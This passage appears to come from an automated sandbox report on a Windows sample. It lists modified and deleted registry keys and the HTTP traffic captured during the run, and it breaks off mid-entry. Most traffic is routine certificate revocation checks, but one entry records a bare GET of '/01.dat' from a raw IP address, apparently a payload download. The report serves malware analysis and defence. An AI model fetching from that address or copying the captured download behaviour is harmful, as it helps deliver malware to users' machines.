  492. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastActivity",
  493. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastRollCall",
  494. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ping_freshness",
  495. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\(Default)",
  496. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\hint",
  497. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\name",
  498. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableCount",
  499. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableSince",
  500. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\LastChecked",
  501. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}",
  502. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingString",
  503. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingTime",
  504. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState",
  505. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadTimeRemainingMs",
  506. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadProgressPercent",
  507. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\StateValue",
  508. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Performance\\PerfMMFileName",
  509. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
  510. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK"
  511. ]
  512.  
  513. [*] Deleted Registry Keys: [
  514. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  516. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  517. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\uid",
  519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\old-uid",
  520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\tttoken",
  521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableCount",
  522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableSince",
  523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
  524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\tttoken"
  525. ]
  526.  
  527. [*] DNS Communications: []
  528.  
  529. [*] Domains: []
  530.  
  531. [*] Network Communication - ICMP: []
  532.  
  533. [*] Network Communication - HTTP: [
  534. {
  535. "count": 1,
  536. "body": "",
  537. "uri": "http://185.140.248.17/01.dat",
  538. "user-agent": "",
  539. "method": "GET",
  540. "host": "185.140.248.17",
  541. "version": "1.1",
  542. "path": "/01.dat",
  543. "data": "GET /01.dat HTTP/1.1\r\nHost: 185.140.248.17\r\nCache-Control: no-cache\r\n\r\n",
  544. "port": 80
  545. },
  546. {
  547. "count": 1,
  548. "body": "",
  549. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  550. "user-agent": "Microsoft-CryptoAPI/6.1",
  551. "method": "GET",
  552. "host": "ocsp.digicert.com",
  553. "version": "1.1",
  554. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  555. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  556. "port": 80
  557. },
  558. {
  559. "count": 1,
  560. "body": "",
  561. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  562. "user-agent": "Microsoft-CryptoAPI/6.1",
  563. "method": "GET",
  564. "host": "ocsp.digicert.com",
  565. "version": "1.1",
  566. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  567. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  568. "port": 80
  569. },
  570. {
  571. "count": 1,
  572. "body": "",
  573. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  574. "user-agent": "Microsoft-CryptoAPI/6.1",
  575. "method": "GET",
  576. "host": "ocsp.digicert.com",
  577. "version": "1.1",
  578. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  579. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  580. "port": 80
  581. },
  582. {
  583. "count": 1,
  584. "body": "",
  585. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
  586. "user-agent": "Microsoft-CryptoAPI/6.1",
  587. "method": "GET",
  588. "host": "ocsp.pki.goog",
  589. "version": "1.1",
  590. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
  591. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  592. "port": 80
  593. },
  594. {
  595. "count": 1,
  596. "body": "",
  597. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
  598. "user-agent": "Microsoft-CryptoAPI/6.1",
  599. "method": "GET",
  600. "host": "ocsp.digicert.com",
  601. "version": "1.1",
  602. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
  603. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D HTTP/1.1\r\nCache-Control: max-age = 89056\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 18:30:24 GMT\r\nIf-None-Match: \"5c9529c0-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  604. "port": 80
  605. },
  606. {
  607. "count": 1,
  608. "body": "",
  609. "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
  610. "user-agent": "Microsoft-CryptoAPI/6.1",
  611. "method": "GET",
  612. "host": "crl.microsoft.com",
  613. "version": "1.1",
  614. "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
  615. "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Feb 2019 02:02:49 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
  616. "port": 80
  617. },
  618. {
  619. "count": 1,
  620. "body": "",
  621. "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
  622. "user-agent": "Microsoft-CryptoAPI/6.1",
  623. "method": "GET",
  624. "host": "ocsp.comodoca.com",
  625. "version": "1.1",
  626. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
  627. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D HTTP/1.1\r\nCache-Control: max-age = 94804\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
  628. "port": 80
  629. },
  630. {
  631. "count": 1,
  632. "body": "",
  633. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
  634. "user-agent": "Microsoft-CryptoAPI/6.1",
  635. "method": "GET",
  636. "host": "ocsp.pki.goog",
  637. "version": "1.1",
  638. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
  639. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  640. "port": 80
  641. },
  642. {
  643. "count": 1,
  644. "body": "",
  645. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
  646. "user-agent": "Microsoft-CryptoAPI/6.1",
  647. "method": "GET",
  648. "host": "ocsp.digicert.com",
  649. "version": "1.1",
  650. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
  651. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1\r\nCache-Control: max-age = 108232\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 23:50:01 GMT\r\nIf-None-Match: \"5c9574a9-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  652. "port": 80
  653. },
  654. {
  655. "count": 1,
  656. "body": "",
  657. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  658. "user-agent": "Microsoft-CryptoAPI/6.1",
  659. "method": "GET",
  660. "host": "www.download.windowsupdate.com",
  661. "version": "1.1",
  662. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  663. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  664. "port": 80
  665. },
  666. {
  667. "count": 1,
  668. "body": "",
  669. "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
  670. "user-agent": "Microsoft-CryptoAPI/6.1",
  671. "method": "GET",
  672. "host": "crl.microsoft.com",
  673. "version": "1.1",
  674. "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
  675. "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 14 Feb 2019 06:01:18 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
  676. "port": 80
  677. },
  678. {
  679. "count": 1,
  680. "body": "",
  681. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
  682. "user-agent": "Microsoft-CryptoAPI/6.1",
  683. "method": "GET",
  684. "host": "ocsp.digicert.com",
  685. "version": "1.1",
  686. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
  687. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP/1.1\r\nCache-Control: max-age = 93156\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 04:40:45 GMT\r\nIf-None-Match: \"5c8c7e4d-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  688. "port": 80
  689. },
  690. {
  691. "count": 1,
  692. "body": "",
  693. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
  694. "user-agent": "Microsoft-CryptoAPI/6.1",
  695. "method": "GET",
  696. "host": "ocsp.digicert.com",
  697. "version": "1.1",
  698. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
  699. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1\r\nCache-Control: max-age = 149079\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:10:47 GMT\r\nIf-None-Match: \"5c961437-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  700. "port": 80
  701. },
  702. {
  703. "count": 1,
  704. "body": "",
  705. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
  706. "user-agent": "Microsoft-CryptoAPI/6.1",
  707. "method": "GET",
  708. "host": "ocsp.digicert.com",
  709. "version": "1.1",
  710. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
  711. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D HTTP/1.1\r\nCache-Control: max-age = 148251\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 18:10:24 GMT\r\nIf-None-Match: \"5c8d3c10-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  712. "port": 80
  713. },
  714. {
  715. "count": 1,
  716. "body": "",
  717. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
  718. "user-agent": "Microsoft-CryptoAPI/6.1",
  719. "method": "GET",
  720. "host": "ocsp.pki.goog",
  721. "version": "1.1",
  722. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
  723. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  724. "port": 80
  725. },
  726. {
  727. "count": 1,
  728. "body": "",
  729. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
  730. "user-agent": "Microsoft-CryptoAPI/6.1",
  731. "method": "GET",
  732. "host": "ocsp.pki.goog",
  733. "version": "1.1",
  734. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
  735. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  736. "port": 80
  737. },
  738. {
  739. "count": 1,
  740. "body": "",
  741. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
  742. "user-agent": "Microsoft-CryptoAPI/6.1",
  743. "method": "GET",
  744. "host": "ocsp.digicert.com",
  745. "version": "1.1",
  746. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
  747. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1\r\nCache-Control: max-age = 126990\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 10:41:16 GMT\r\nIf-None-Match: \"5c960d4c-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  748. "port": 80
  749. },
  750. {
  751. "count": 1,
  752. "body": "",
  753. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
  754. "user-agent": "Microsoft-CryptoAPI/6.1",
  755. "method": "GET",
  756. "host": "ocsp.pki.goog",
  757. "version": "1.1",
  758. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
  759. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  760. "port": 80
  761. },
  762. {
  763. "count": 1,
  764. "body": "",
  765. "uri": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
  766. "user-agent": "Microsoft-CryptoAPI/6.1",
  767. "method": "GET",
  768. "host": "ocsp.msocsp.com",
  769. "version": "1.1",
  770. "path": "/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
  771. "data": "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 17:46:18 GMT\r\nIf-None-Match: \"dd54d75d4688b8dc62b087df4e04af258704c48b\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.msocsp.com\r\n\r\n",
  772. "port": 80
  773. },
  774. {
  775. "count": 1,
  776. "body": "",
  777. "uri": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
  778. "user-agent": "Microsoft-CryptoAPI/6.1",
  779. "method": "GET",
  780. "host": "ocsp.thawte.com",
  781. "version": "1.1",
  782. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
  783. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D HTTP/1.1\r\nCache-Control: max-age = 320712\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Wed, 20 Mar 2019 11:42:01 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.thawte.com\r\n\r\n",
  784. "port": 80
  785. },
  786. {
  787. "count": 1,
  788. "body": "",
  789. "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
